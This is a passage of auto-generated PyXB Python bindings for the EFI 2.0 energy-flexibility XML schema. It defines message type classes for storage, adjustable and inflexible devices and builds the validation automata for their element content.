__actuatorStatuses = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatuses'), 'actuatorStatuses', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_34_httpwww_flexiblepower_orgefi_2actuatorStatuses', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6), )
actuatorStatuses = property(__actuatorStatuses.value, __actuatorStatuses.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__currentFillLevel.name() : __currentFillLevel,
__actuatorStatuses.name() : __actuatorStatuses
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_34 = CTD_ANON_34
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_35 (StorageUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 754, 2)
_ElementMap = StorageUpdate._ElementMap.copy()
_AttributeMap = StorageUpdate._AttributeMap.copy()
# Base type is StorageUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}targetProfile uses Python identifier targetProfile
__targetProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'targetProfile'), 'targetProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_35_httpwww_flexiblepower_orgefi_2targetProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 758, 6), )
targetProfile = property(__targetProfile.value, __targetProfile.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__targetProfile.name() : __targetProfile
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_35 = CTD_ANON_35
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_36 (StorageUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 765, 2)
_ElementMap = StorageUpdate._ElementMap.copy()
_AttributeMap = StorageUpdate._AttributeMap.copy()
# Base type is StorageUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}usageForecast uses Python identifier usageForecast
__usageForecast = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageForecast'), 'usageForecast', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_36_httpwww_flexiblepower_orgefi_2usageForecast', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 769, 6), )
usageForecast = property(__usageForecast.value, __usageForecast.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__usageForecast.name() : __usageForecast
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_36 = CTD_ANON_36
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_37 (AdjustableUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 879, 2)
_ElementMap = AdjustableUpdate._ElementMap.copy()
_AttributeMap = AdjustableUpdate._AttributeMap.copy()
# Base type is AdjustableUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}runningModes uses Python identifier runningModes
__runningModes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), 'runningModes', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_37_httpwww_flexiblepower_orgefi_2runningModes', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 883, 6), )
runningModes = property(__runningModes.value, __runningModes.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}timers uses Python identifier timers
__timers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timers'), 'timers', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_37_httpwww_flexiblepower_orgefi_2timers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6), )
timers = property(__timers.value, __timers.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}transitions uses Python identifier transitions
__transitions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitions'), 'transitions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_37_httpwww_flexiblepower_orgefi_2transitions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 885, 6), )
transitions = property(__transitions.value, __transitions.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__runningModes.name() : __runningModes,
__timers.name() : __timers,
__transitions.name() : __transitions
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_37 = CTD_ANON_37
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_38 (AdjustableUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 897, 2)
_ElementMap = AdjustableUpdate._ElementMap.copy()
_AttributeMap = AdjustableUpdate._AttributeMap.copy()
# Base type is AdjustableUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}currentRunningModeId uses Python identifier currentRunningModeId
__currentRunningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currentRunningModeId'), 'currentRunningModeId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2currentRunningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 901, 6), )
currentRunningModeId = property(__currentRunningModeId.value, __currentRunningModeId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
__runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 902, 6), )
runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}previousRunningModeId uses Python identifier previousRunningModeId
__previousRunningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), 'previousRunningModeId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2previousRunningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 910, 6), )
previousRunningModeId = property(__previousRunningModeId.value, __previousRunningModeId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}transitionTimestamp uses Python identifier transitionTimestamp
__transitionTimestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), 'transitionTimestamp', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2transitionTimestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 911, 6), )
transitionTimestamp = property(__transitionTimestamp.value, __transitionTimestamp.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}timerUpdates uses Python identifier timerUpdates
__timerUpdates = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), 'timerUpdates', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2timerUpdates', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 912, 6), )
timerUpdates = property(__timerUpdates.value, __timerUpdates.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__currentRunningModeId.name() : __currentRunningModeId,
__runningModeFactor.name() : __runningModeFactor,
__previousRunningModeId.name() : __previousRunningModeId,
__transitionTimestamp.name() : __transitionTimestamp,
__timerUpdates.name() : __timerUpdates
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_38 = CTD_ANON_38
InstructionStatusUpdate = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InstructionStatusUpdate'), CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 74, 1))
Namespace.addCategoryObject('elementBinding', InstructionStatusUpdate.name().localName(), InstructionStatusUpdate)
FlexibilityRevoke = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'FlexibilityRevoke'), CTD_ANON_13, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 96, 1))
Namespace.addCategoryObject('elementBinding', FlexibilityRevoke.name().localName(), FlexibilityRevoke)
InstructionRevoke = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InstructionRevoke'), CTD_ANON_14, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 103, 1))
Namespace.addCategoryObject('elementBinding', InstructionRevoke.name().localName(), InstructionRevoke)
Measurement = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Measurement'), CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 252, 1))
Namespace.addCategoryObject('elementBinding', Measurement.name().localName(), Measurement)
InflexibleRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleRegistration'), CTD_ANON_22, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 215, 1))
Namespace.addCategoryObject('elementBinding', InflexibleRegistration.name().localName(), InflexibleRegistration)
InflexibleInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleInstruction'), CTD_ANON_23, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 318, 1))
Namespace.addCategoryObject('elementBinding', InflexibleInstruction.name().localName(), InflexibleInstruction)
ShiftableRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ShiftableRegistration'), CTD_ANON_24, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 340, 1))
Namespace.addCategoryObject('elementBinding', ShiftableRegistration.name().localName(), ShiftableRegistration)
ShiftableUpdate = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ShiftableUpdate'), CTD_ANON_25, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 375, 1))
Namespace.addCategoryObject('elementBinding', ShiftableUpdate.name().localName(), ShiftableUpdate)
ShiftableInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ShiftableInstruction'), CTD_ANON_26, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 399, 1))
Namespace.addCategoryObject('elementBinding', ShiftableInstruction.name().localName(), ShiftableInstruction)
StorageRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageRegistration'), CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 410, 1))
Namespace.addCategoryObject('elementBinding', StorageRegistration.name().localName(), StorageRegistration)
StorageInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageInstruction'), CTD_ANON_28, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 802, 1))
Namespace.addCategoryObject('elementBinding', StorageInstruction.name().localName(), StorageInstruction)
AdjustableRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableRegistration'), CTD_ANON_29, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 813, 1))
Namespace.addCategoryObject('elementBinding', AdjustableRegistration.name().localName(), AdjustableRegistration)
AdjustableInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableInstruction'), CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 918, 1))
Namespace.addCategoryObject('elementBinding', AdjustableInstruction.name().localName(), AdjustableInstruction)
InflexibleForecast = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleForecast'), CTD_ANON_31, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 280, 1))
Namespace.addCategoryObject('elementBinding', InflexibleForecast.name().localName(), InflexibleForecast)
InflexibleCurtailmentOptions = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleCurtailmentOptions'), CTD_ANON_32, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 307, 1))
Namespace.addCategoryObject('elementBinding', InflexibleCurtailmentOptions.name().localName(), InflexibleCurtailmentOptions)
StorageSystemDescription = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageSystemDescription'), CTD_ANON_33, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 680, 1))
Namespace.addCategoryObject('elementBinding', StorageSystemDescription.name().localName(), StorageSystemDescription)
StorageStatus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageStatus'), CTD_ANON_34, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 730, 1))
Namespace.addCategoryObject('elementBinding', StorageStatus.name().localName(), StorageStatus)
StorageFillLevelTargetProfile = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageFillLevelTargetProfile'), CTD_ANON_35, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 753, 1))
Namespace.addCategoryObject('elementBinding', StorageFillLevelTargetProfile.name().localName(), StorageFillLevelTargetProfile)
StorageUsageForecast = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageUsageForecast'), CTD_ANON_36, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 764, 1))
Namespace.addCategoryObject('elementBinding', StorageUsageForecast.name().localName(), StorageUsageForecast)
AdjustableSystemDescription = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableSystemDescription'), CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 878, 1))
Namespace.addCategoryObject('elementBinding', AdjustableSystemDescription.name().localName(), AdjustableSystemDescription)
AdjustableStatus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableStatus'), CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 896, 1))
Namespace.addCategoryObject('elementBinding', AdjustableStatus.name().localName(), AdjustableStatus)
EfiMessage._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'header'), CTD_ANON, scope=EfiMessage, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(EfiMessage._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
EfiMessage._Automaton = _BuildAutomaton()
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'efiResourceId'), Identifier, scope=CTD_ANON, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 27, 6)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timestamp'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 28, 6)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'efiResourceId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 27, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 28, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton_()
DeviceDescription._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'deviceClass'), DeviceClass, scope=DeviceDescription, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 37, 3)))
DeviceDescription._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'serialNumber'), pyxb.binding.datatypes.string, scope=DeviceDescription, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3)))
DeviceDescription._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'label'), pyxb.binding.datatypes.string, scope=DeviceDescription, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3))
counters.add(cc_1)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(DeviceDescription._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceClass')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 37, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(DeviceDescription._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'serialNumber')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(DeviceDescription._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'label')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
DeviceDescription._Automaton = _BuildAutomaton_2()
StorageUsageProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_, scope=StorageUsageProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 146, 3)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageUsageProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 146, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageUsageProfile._Automaton = _BuildAutomaton_3()
StorageUsageProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageRateElement'), ProbabilityAttributesWithDuration, scope=StorageUsageProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 156, 3)))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageUsageProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'usageRateElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 156, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageUsageProbabilityProfile._Automaton = _BuildAutomaton_4()
ElectricityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_2, scope=ElectricityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 161, 3)))
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(ElectricityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 161, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ElectricityProfile._Automaton = _BuildAutomaton_5()
ElectricityProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'powerElement'), ProbabilityAttributesWithDuration, scope=ElectricityProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 171, 3)))
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(ElectricityProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'powerElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 171, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ElectricityProbabilityProfile._Automaton = _BuildAutomaton_6()
GasProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_3, scope=GasProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 176, 3)))
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(GasProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 176, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
GasProfile._Automaton = _BuildAutomaton_7()
GasProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flowRateElement'), ProbabilityAttributesWithDuration, scope=GasProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 186, 3)))
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(GasProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flowRateElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 186, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
GasProbabilityProfile._Automaton = _BuildAutomaton_8()
HeatProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_4, scope=HeatProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 191, 3)))
def _BuildAutomaton_9 ():
# Remove this helper function from the namespace after it is invoked
